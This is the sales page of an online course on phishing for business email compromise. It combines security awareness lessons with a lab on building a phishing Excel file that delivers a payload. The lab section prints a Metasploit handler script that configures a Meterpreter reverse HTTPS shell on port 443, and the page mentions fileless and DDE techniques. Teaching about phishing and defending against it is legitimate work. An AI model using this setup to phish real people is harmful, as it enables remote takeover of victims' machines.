[Basic to Advanced] - Phishing on Business Email Compromise
1.9 (11 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
1,243 students enrolled

[Basic to Advanced] - Phishing on Business Email Compromise

The cost is cheap/short but it is lifelong use.
1.9 (11 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
1,243 students enrolled
Created by Pareto Yiu
Last updated 10/2017
English
English
Current price: $13.99 Original price: $19.99 Discount: 30% off
5 hours left at this price!
30-Day Money-Back Guarantee
This course includes
  • 33 mins on-demand video
  • 6 downloadable resources
  • Full lifetime access
  • Access on mobile and TV
  • Certificate of Completion
Training 5 or more people?

Get your team access to 4,000+ top Udemy courses anytime, anywhere.

Try Udemy for Business
What you'll learn
  • Security awareness on phishing attack.
  • Technically make the demo on Phishing attack
  • How hacker gather information to the target company ?
  • Learn how to add payload to email and phishing
  • How to educate the users to avoid being phishing
Requirements
  • Want to know prevention of phishing
  • Basic usage of Kali Linux
  • Basic understanding of Network connection of VMs
Description

This course will cover the basic to advanced phishing techniques on business email compromise. You will learn the attack from attacker 's view and know how to defence.

i.e. 

For non - technical, please focus on General Security Awareness, you will learn a lot from phishing and understand how to defence it.

For technical, you can learn how to make a phishing email POC by meterpreter using MS excel. Also the latest phishing method "DDE" is also working in progress. 

General Security Awareness topic:

  1. Basic information - What is Phishing ? Why Phishing is common? The scope is covered most basic information about phishing.
  2. Information Resources - Where do attackers get the information? It aims to let you know how attacker collect your information and how to prevent it.
  3. How to begin as email scammer - What will you do if you are scammers? Of course I will not recommend anyone to be scammer but if you understand how to make it, you will know how to defence it.
  4. What is spoof of Domain - Common Techniques, This Chapter is very good that I can show you what common techniques that attacker will use.
  5. How to defence - There are solutions from different roles.

Technical area:

A REAL Lab - how to setup phishing attack

This lab will teach you how to setup phishing attack plus below features:

a. Fileless attack and difficult to trace

b. 443 port attack and not easy to block


(Working in Progress)

Lab on how to setup DDE attack, you will know exact coding inside the document.


Who this course is for:
  • College Students
  • Cyber Security Professionals
  • Boss
Course content
Expand all 9 lectures 33:23
+ Main
6 lectures 21:05

Briefly mention what will cover in this course

Preview 02:08

Students can reference the excel file and do the demo as same as the video. Any questions can ask here, I can provide sample excel as well if needed.

Preview 05:01
Security Awareness: Understand the spammer thinking
02:19
Security Awareness: What is spoof of Domain
02:52
Security Awareness: How to Defense
03:12
+ Lab : Phishing Email Attack
3 lectures 12:18

Environment Setup:

1. Download the VMs and run in the same machine.

VM for Windows: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Choose Windows 10 and suitable for your VM solution.'

VM for Kali : https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

2. Download the zip file 

Excel file store in Window VM

Payload file store in Kali VM

3. Create rc script file in Kali VM

demo_web.rc :
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <<Kali VM ip address>>
set LPORT 443

Phishing Email
02:49
Metasploit setup
04:04
What action can do and troubleshoot
05:25